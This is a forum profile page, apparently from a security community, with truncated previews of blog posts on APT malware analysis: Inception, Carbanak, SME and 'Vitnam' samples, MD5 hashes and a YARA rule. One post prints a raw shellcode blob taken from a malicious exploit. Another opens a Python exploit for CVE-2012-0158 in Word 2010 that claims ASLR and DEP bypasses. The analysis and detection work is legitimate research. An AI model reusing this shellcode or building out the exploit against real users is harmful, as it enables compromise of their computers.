No Recent Activity
About w@rri0r@bh@y

Basic Information

Statistics


Total Posts
Total Posts
6
Posts Per Day
0.00
General Information
Last Activity
03-23-2015 06:00 PM
Join Date
02-22-2014
Referrals
0
View w@rri0r@bh@y's Blog

Recent Entries

Apt inception

by w@rri0r@bh@y on 03-23-2015 at 05:09 PM
Greet: "Vinnu", "nightrover","bond"

In the month of Dec 2014 BlueCoat released report on APT campaign named ad "Inception". The spear phishing mail was sent with attachment with various names we analyzed attachment which was named as "Car for sale.doc". The Attachment was exploit (CVE-2012-0158) with embed VBS and decoy file themed an advertisement of a used car for sale that purportedly originated from Michael Hahne employee at the

Read More

Updated 03-23-2015 at 05:59 PM by 41.w4r10r

Categories
Uncategorized

Apt sme

by w@rri0r@bh@y on 03-20-2015 at 11:41 AM
Greet : "Vinnu", "nightrover","bond"

I have used name "APT SME " because payload developer have used the name for his project.I have just created automation to exctract payload file from the exploit used in APT SME.

Sample used for creating Automation:
Md5 - 57A8DB5A5D35464BE16518332A64A992

Shellcode:

Code:
e80000000081efb178fd9401f76681e6a9008b04248d7424186681cfa81d83c40181f782e7813383c40281e7e3000000446681eeb25e83e8056689ff66c1ef7905c00000006681e7bc00bb84feffffc1e66cf7db8d7c241883e20066c1e6f880e50001f680c5378d74242080c5b46601f666478a0883e76e01fe30e96681ce483df6c101751581f782e7813380c1016681cee476eb106681f7ecf181ce63af2725fec9c1e63bc1efed880866c1e74d83c2016629f783e8ff8d7c240439da75b1db238e619bda619ce6619cf66184e261acca61dc8cd3a2f29f1861afd661beef92eb006198caeb04db23ab47eb0261f2c1b2ee6b110fca37159f05a361b0ceeb018c61e6a161b0f6eb01e9c661bfdb318c6b2115e5a980e2b961aecee2153a6f2a9f0752a5a588886335459f02459f0f6bd54d4d31319f32bcbdb963146904e2537344e8ea522f77f66b5579ebeaeb1d0dd8ecac0813b1b5b4d747f370699f5a692deeb3bddb235c38546744e8ea60fd6a10ea9ee36a2ceed2189ee8da1862fdabadd31b9f02b58c53a7b08c63e5bddb238e619bda619ce6619cf66184e26194ca61dcd2a5f29f1901a3b58207d38bf0153d821515e5ea15dece82eaeaeeea153aefeafaeaeaba159eceeedb232deaeaeaeaea692bee692aee6b13ea7ae9ea9f06b4b553cfe6eaeabc6b2c8248e8eabd194e29025815151561afd661b6ef92eb0161a1f209d8a361a9caeb0261de62eb04db2a7346eb282b20e7a2931dd1beceee9f0b61a9ceeb028c61e6a261a9f6eb0261ee62eb026313b0b4b82900

Read More

Updated 03-20-2015 at 12:00 PM by w@rri0r@bh@y

Categories
Uncategorized

Apt vitnam

by w@rri0r@bh@y on 03-20-2015 at 11:34 AM
Greet :- "vinnu","nightrover","bond"

I used the name "VITNAM" because the decoy file had some contents from Vietnam. Here i have automated a process through which we can extract an Executable from rtf exploit.

Yara Rule:
Code:
rule APT_VITNAM {
  meta:
   author = "w@rri0r@bh@y"
  strings :
   $magic = "{\\rt"
   $v0 = "eb00eb1490905e33c980368746"

Read More

Updated 03-20-2015 at 02:35 PM by [s]

Categories
Uncategorized

Apt carbanak

by w@rri0r@bh@y on 03-20-2015 at 11:30 AM
Greet : "Vinnu", "nightrover","bond"

All the analysis is done by "Kaspersky" company. I have just created automation to exctract payload from the exploit used in APT CARBANAK.

Sample used for creating Automation:
Md5 - 8fa296efaf87ff4d9179283d42372c52, 665b6cb31d962aefa3037b5849889e06, 2c395f211db2d02cb544448729d0f081, 31e16189e9218cb131fdb13e75d0a94f, db83e301564ff613dd1ca23c30a387f0, 86e48a9be62494bffb3b8e5ecb4a0310, 6c7ac8dfd7bc5c2bb1a6d7aec488c298

Read More

Updated 03-20-2015 at 12:01 PM by w@rri0r@bh@y

Categories
Uncategorized

Exploit for MS WORD 2010 in Windows 7 (CVE-2012-0158)

by w@rri0r@bh@y on 03-01-2014 at 04:14 PM
Exploit For MS WORD 2010
CVE-2012-0158
ASLR BYPASS - MSCOMCTL.OCX (non-ASLR Module)
DEP BYPASS - Complete code in code section

Code:
#!/usr/bin/python

import struct
import binascii

header = (
"\x7B\x5C\x72\x74\x66\x31\x0D\x0A\x7B\x5C\x66\x6F\x6E\x74\x74\x62\x6C\x7B\x5C\x66\x30\x5C"
"\x66\x6E\x69\x6C\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x30\x20\x56\x65\x72\x64\x61\x6E\x61"
"\x3B\x7D\x7D\x0D\x0A\x5C\x76\x69\x65\x77\x6B\x69\x6E\x64\x34\x5C\x75\x63\x31\x5C\x70\x61"

Read More

Updated 03-02-2014 at 07:55 PM by w@rri0r@bh@y

Categories
Uncategorized